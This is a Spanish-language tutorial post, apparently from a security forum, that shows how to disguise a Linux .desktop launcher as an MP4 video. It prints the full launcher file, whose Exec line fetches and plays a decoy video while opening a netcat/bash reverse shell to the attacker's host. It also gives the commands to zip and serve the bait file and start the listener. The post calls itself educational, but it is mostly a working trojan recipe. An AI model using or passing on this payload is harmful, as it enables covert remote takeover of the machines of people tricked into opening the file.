Hackers usan Archivo MP4 para Acceder a tu PC | Seguridad Informática
Publicado: 11 Mar 2021, 20:11
Obtener una conexión remota a través de un Archivo de Vídeo Falso Falso con Kali Linu. Con un archivo de vídeo te pueden hackear
LABORATORIO (Un equipo Windows, Kali Linux y una Distribución Linux Mint)
COMANDOS EJECUTADOS
Instalar PythonCrear Archivo fake de Vídeo
CODIGO que va DENTRO del Archivo
CAMBIAR PERMISOS
Copiar Archivos a la Carpeta /tmpCREAR ARCHIVO ZIP COMPRIMIDOLEVANTAR SERVICIO WEB HTTP de PythonLEVANTAR el SERVICIO LISTENER
VIDEO TUTORIAL
Comandos Extras
conexion shell,cursos,courses,training,How to Pop a Shell Using a Video,Create a Reverse Shell,conexion inversa,cyber seguridad,cyber security,python,how to,ethical hacker,ethical hacking,ubuntu,linux,mint,unix,educational purposes,guia,guide,linux for ethical,Information Systems Security,nas,xpenology,synology,file manager,GNOME,Cinnamon,MATE,KDE,XFCE4,debian,issue,bug,error
LABORATORIO (Un equipo Windows, Kali Linux y una Distribución Linux Mint)
COMANDOS EJECUTADOS
Instalar Python
Código: Seleccionar todo
apt-get update && apt-get install python3Código: Seleccionar todo
nano fake_video.desktopCódigo: Seleccionar todo
[Desktop Entry]
Encoding=UTF-8
Name=fake_video.mp4
Exec=/usr/bin/wget 'http://192.168.1.183/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/xdg-open /tmp/real_video.mp4; /usr/bin/mkfifo /tmp/f; /bin/nc 192.168.1.183 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 &
Terminal=false
Type=Application
Icon=video-x-genericCódigo: Seleccionar todo
chmod +x fake_video.desktopCódigo: Seleccionar todo
cp fake_video.desktop real_video.mp4 /tmpCódigo: Seleccionar todo
zip -r videos.zip ../archivosCódigo: Seleccionar todo
python3 -m http.server 80Código: Seleccionar todo
nc -vv -l -p 1234Comandos Extras
Código: Seleccionar todo
uname -a
ifconfig
hostnamectl